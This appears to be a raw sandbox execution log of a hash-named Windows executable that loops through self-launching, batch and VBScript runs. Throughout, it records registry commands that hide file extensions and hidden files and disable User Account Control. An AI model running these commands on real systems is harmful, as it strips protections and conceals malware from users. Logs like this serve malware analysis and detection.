C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ymUkAwMg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-199972283277464511958049468031115895748489538311245507591270204475-854630471"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1949466503-588619328-449390173-109143969713474546671859917013-77872767833413159"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "8935948211949087966-1456478090112731215913199072029130688271968511013-715415155"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2594725002940095041309345526-8076001402063537237-20917920761916499444-1547861036"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\kwwQUUwI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TCcosMss.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1575315247479477155390987868161400076972655184-431215454-1947746190-373271271"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LwsscooM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LeYEwMwg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "556118586-1052395094-449662403-1295206282-1882816012-1009215154-1610574023-1958133526"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\dUIUkEUw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\KcYowQEs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wSAoUAAI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1879610405-216618833-176957901525969171606425646-6392640131929243115529136031"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wyoIYoUg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\IqMcMcEU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EQEMIIYc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\rwQMYgoA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1481473575-783906451-166391476648077970-1674597620-804618824-309963891-902271836"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HusgIgsA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "37107306145399373711718816856752214921314012822150393302417639708441234967111"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LwUkIsMk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1239256344-2145490306-1539428292-3340451951796055399-404428843100951372232046991"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18666846701474385849-1213699445-1497470846-8915176927816676379615751-756733498"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\IwksIgAk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-465304230-517874289-10534349988126929581497560644-68466542-2020343655-101608775"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1350808882-5453537421564592666-655852780-533066597752135518-3621755621928470193"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1509122057-1127004567-11312992463108403912496594694389030962087594095893845871"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "852542501564466909-18310009601163528624-11608927471440770230168145602283681461"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\MwAcEQMY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2131290201107990077-1650911923-1131360559-918829993824631734-12880879171194919929"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\iEwQUAgM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1703757426-924424572-16728616841370153711482732379504997359-138522438-2114709997"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-933210782978936213-16374097711803220092-705442303-9642180492038530291070350131"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GogEMMwA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GkAAoIUY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\raQEMksk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5909307041696309684-899844256-628867896553729357-917113804-185731855-1234046222"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LWEIEgQw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
